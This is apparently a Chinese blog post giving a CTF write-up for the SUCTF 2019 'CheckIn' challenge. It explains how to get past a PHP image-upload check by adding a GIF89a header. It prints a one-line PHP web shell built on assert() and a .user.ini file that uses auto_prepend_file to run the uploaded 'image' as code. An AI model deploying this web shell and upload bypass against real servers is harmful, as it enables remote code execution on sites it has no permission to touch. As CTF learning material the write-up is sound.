[SUCTF 2019]CheckIn 1

1.发现

1.打开题目地址发现为文件上传,随便上传JPG/PHP/TXT文件。

 

 

 

 

2.发现PHP文件上传不去,并发现exif_imagetype()函数

函数功能是读取一个图像的第一个字节并检查其签名。 在一句话前面加个GIF89a进行绕过

那么现在的一句话如下,可以制作成图片马,但是需要解析成php

GIF89a
<script language='php'>assert($_REQUEST['cmd'])</script>

正常想到的是.htaccess,但是这个服务器是nginx,而.htaccess是针对apache的

知识点

1)exif_imagetype()函数:PHP: exif_imagetype - Manual

2.步骤

思路:上传图片马,然后利用.user.ini解析图片马生成webshell

知识点

1).user.ini文件构成的PHP后门:.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)

1.生成图片马

2.生产.user.ini文件

GIF89a
auto_prepend_file=shell.jpg

3.上传.user.ini和图片马

 

4.然后根据上传的路径,找到上传的Webshell,获取flag。

3.参考

[SUCTF 2019]CheckIn - 高诺琪 - 博客园 (cnblogs.com)

 

posted @ 2021-10-17 20:08  WeQi_Blog  阅读(764)  评论(0)    收藏  举报